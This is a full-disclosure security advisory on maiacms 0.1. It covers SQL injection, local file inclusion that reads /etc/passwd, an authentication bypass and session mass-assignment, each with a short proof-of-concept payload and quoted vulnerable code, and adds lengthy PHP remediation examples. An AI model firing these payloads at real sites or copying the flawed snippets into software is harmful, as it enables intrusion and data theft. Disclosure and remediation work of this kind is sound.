JAHx103 - Multiple vulnerabilities in maiacms

--------------------------------------------------------------------------------------------
20100625 - Justanotherhacker.com : Multiple vulnerabilities in maiacms
JAHx103 - http://www.justanotherhacker.com/advisories/JAHx103.txt
--------------------------------------------------------------------------------------------

MaiaCMS is an open source PHP based content management system (CMS). It is designed with simplicity in mind to help you easily build and maintain your web site. It is freely available to everyone.
[ Taken from: http://maiacms.sourceforge.net/ ]

--- Vulnerability description ---
Multiple vulnerabilities exist in maiacms; the following are some of them.

Discovered by: Eldar "Wireghoul" Marcussen
Severity: Low
Release: Full disclosure
Affected versions: 0.1

--- SQL injection ---
The index.php script does not properly sanitize the page parameter, resulting in several paths to SQL injection.
PoC:
/index.php?page=1' or 'a'='a
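As an added example (not maiacms code), this is how the page parameter could be handled so that its value can never alter the query. It assumes a PDO connection in $pdo and a table named pages; the advisory does not show the project's own database layer or schema, so both are placeholders.

```php
<?php
// Added example, not maiacms source: safe handling of the index.php "page" parameter.
// Assumptions: $pdo is a PDO connection; the table "pages" with columns id/title/body is a placeholder.

// Unsafe pattern (illustrative only): user input concatenated into the query text, so a value
// containing a quote changes the structure of the statement rather than just its data.
//   $sql = "SELECT * FROM pages WHERE id = '" . $_GET['page'] . "'";

function load_page(PDO $pdo, $raw)
{
    // 1. Type validation: page ids are positive integers, so reject everything else up front.
    //    filter_var also returns false for array input such as ?page[]=1.
    $id = filter_var($raw, FILTER_VALIDATE_INT, array('options' => array('min_range' => 1)));
    if ($id === false) {
        http_response_code(400);
        return null;
    }

    // 2. Prepared statement: the value is bound as data and never becomes part of the SQL text.
    $stmt = $pdo->prepare('SELECT id, title, body FROM pages WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ? $row : null;
}

$page = load_page($pdo, isset($_GET['page']) ? $_GET['page'] : '');
if ($page === null) {
    echo 'Page not found';
} else {
    // Output encoding is a separate concern from the injection, but belongs here anyway.
    echo htmlspecialchars($page['title'], ENT_QUOTES, 'UTF-8');
}
```

The integer check alone would already stop the PoC value above, but the prepared statement is what makes the query safe regardless of how the validation evolves; keeping both means a later change to one layer does not silently reopen the hole.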

--- Local file inclusion ---
The admin/index.php script does not properly sanitize the com or file parameters, resulting in local file inclusion.
PoC:
/admin/index.php?com=../../../../../../../../etc/passwd%00
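As an added example (not maiacms code), the following resolves the admin com parameter against a fixed allowlist instead of building a file path from it. The component directory and the component names are placeholders, since the advisory does not show how admin/index.php lays out its components.

```php
<?php
// Added example, not maiacms source: resolving the admin "com" parameter without file inclusion.
// Assumptions: components are PHP files under COMPONENT_DIR; the names in the allowlist are placeholders.

define('COMPONENT_DIR', __DIR__ . '/components');

// The only values the parameter may take. A value containing path separators, "..", or a
// null byte is simply not a key in this array and never reaches include().
$allowed_components = array(
    'dashboard'  => 'dashboard.php',
    'list_pages' => 'list_pages.php',
    'settings'   => 'settings.php',
);

function resolve_component(array $allowed, $raw)
{
    // is_string rejects ?com[]=x, which would otherwise be an illegal array offset.
    if (!is_string($raw) || !isset($allowed[$raw])) {
        return null;
    }
    $path = COMPONENT_DIR . '/' . $allowed[$raw];

    // Defence in depth: even a listed file must resolve to a location inside the component directory.
    $real = realpath($path);
    $base = realpath(COMPONENT_DIR);
    if ($real === false || $base === false || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

$file = resolve_component($allowed_components, isset($_GET['com']) ? $_GET['com'] : 'dashboard');
if ($file === null) {
    http_response_code(404);
    echo 'Unknown component';
    exit;
}
include $file;
```

The allowlist is the actual control; the realpath check only guards against a mistake in the list itself (for example a symlink left in the component directory), and the same approach applies to the file parameter named in the advisory.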

--- Authentication bypass ---
Most of the admin pages have a check-and-redirect-to-login snippet to validate the login. From list_pages.php:
<?php
    require ("../includes/connections.php"); //Includes functions and database connection
    
    if (empty($is_admin)) {
        header("Location: login.php");
    }
However it does not halt execution after the header redirect. This allows code to be executed past the point of redirection.

PoC:
curl 'http://maiacms.sourceforge.net/admin/list_pages.php?id=1&category=1'

--- Session control ---
The script update_session.php relies on the aforementioned access control weakness and allows the session data to be changed or created directly through an HTTP POST operation. From update_session.php:
<?php
require_once("../includes/connections.php");

if (empty($is_admin)) {
        header("Location: /admin/login.php");
    }
    
foreach ($_POST as $key => $value) {
    $_SESSION[$key] = $value;
}

$db->Close();
?>
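As an added example (not maiacms code) covering both the authentication bypass and the session control issue above, this rewrites the update_session.php pattern so that the redirect actually halts the script and so that only named session keys with validated values can be set from a POST body. It assumes, as the advisory's listings do, that connections.php starts the session and sets $is_admin; the permitted session keys and their validators are placeholders.

```php
<?php
// Added example, not maiacms source: the login check with execution halted, plus a session
// update that accepts only known keys. Assumptions: connections.php starts the session and
// sets $is_admin and $db as in the advisory; the allowed keys below are placeholders.
require_once("../includes/connections.php");

function require_admin($is_admin)
{
    if (empty($is_admin)) {
        header("Location: /admin/login.php");
        // A Location header is only a response header; without exit the rest of the
        // script still runs for the unauthenticated request, which is the bypass.
        exit;
    }
}

// Keys an administrator may set through this script, each with a validator for its value.
$allowed_session_keys = array(
    'editor_theme'  => function ($v) { return in_array($v, array('light', 'dark'), true); },
    'rows_per_page' => function ($v) { return ctype_digit($v) && (int) $v >= 10 && (int) $v <= 100; },
);

function update_session(array $post, array $allowed)
{
    $applied = array();
    // Iterate over the allowlist, never over $_POST: fields the client invents are simply
    // never looked at, so the request cannot create arbitrary session entries.
    foreach ($allowed as $key => $validate) {
        if (isset($post[$key]) && is_string($post[$key]) && $validate($post[$key])) {
            $_SESSION[$key] = $post[$key];
            $applied[] = $key;
        }
    }
    return $applied;
}

require_admin($is_admin);

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    exit;
}

$changed = update_session($_POST, $allowed_session_keys);
$db->Close();
```

The two fixes are independent and both are needed: the exit closes the bypass for every admin script that uses the snippet, while the allowlist removes the mass assignment so that even a legitimately logged-in administrator can only change the session fields the application intends.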

--- Solution ---
Wait for the next release, or for a non-alpha release.

--- Disclosure time line ---
25-Jun-2010 - Public disclosure
25-Jun-2010 - Vendor notified through email
25-Jun-2010 - Vendor response

This weblog is licensed under a Creative Commons License.